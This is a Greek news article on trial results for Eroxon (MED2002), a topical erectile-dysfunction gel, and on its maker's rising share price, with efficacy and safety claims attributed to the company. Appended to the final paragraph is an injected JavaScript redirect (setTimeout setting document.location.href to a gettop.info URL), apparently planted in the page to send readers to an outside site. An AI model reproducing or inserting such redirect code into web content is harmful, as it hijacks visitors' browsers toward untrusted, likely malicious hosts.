Τέλος «εποχής» για το βιάγκρα; Η αλοιφή που υπόσχεται…. θαύματα άμεσα

0
38

 

Μια αλοιφή που έχει άμεσα αποτελέσματα στην καταπολέμηση των προβλημάτων στύσης έρχεται να γεμίσει ελπίδα χιλιάδες άνδρες.

Οι δοκιμές που έγιναν σε 232 άνδρες έδειξαν ότι η αλοιφή είχε τα επιθυμητά αποτελέσματα στο 82% μέσα σε δέκα λεπτά, με αποτέλεσμα οι μετοχές της υπεύθυνης βρετανικής φαρμακευτικής εταιρείας να σημειώσουν «τρελή» άνοδο.

Αυτή η έρευνα καθιστά τη νέα αλοιφή ανταγωνιστική του βιάγκρα, το οποίο σε γενικές γραμμές χρειάζεται περίπου 30 λεπτά για να ενεργήσει.

Σύμφωνα με την Daily Mail, η φαρμακευτική εταιρία Futuru, μπορεί να αποκτήσει μερίδιο στην παγκόσμια αγορά που θα ξεπερνά τα 5 δισ. ετησίως. Η αξία των μετοχών της εταιρίας διπλασιάστηκε την Πέμπτη, μετά την ανακοίνωση των αποτελεσμάτων των ερευνών για τη νέα αλοιφή που θα πωλείται με την ονομασία Eroxon.

Σύμφωνα με την εταιρεία το προϊόν θα εφαρμόζεται κατευθείαν στο ανδρικό μόριο και όπως έδειξαν οι έρευνες το 82% των ανδρών που είχαν προβλήματα στυτικής δυσλειτουργίας αντιμετωπίστηκαν με την αλοιφή σε λιγότερο από 10 λεπτά. Αυτό σημαίνει ότι η MED2002, επιστημονική ονομασία της αλοιφής, θα είναι η πιο γρήγορη θεραπεία για τη στυτική δυσλειτουργία. Σύμφωνα πάντα με την εταιρία, δεν έχουν παρατηρηθεί ανησυχίες ή δυσμενείς επιπτώσεις από τη χρήση της αλοιφής.

Ως αποτέλεσμα, συμπλήρωσαν, η αλοιφή μπορεί να πωλείται και με συνταγή γιατρού, αλλά και χωρίς συνταγή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here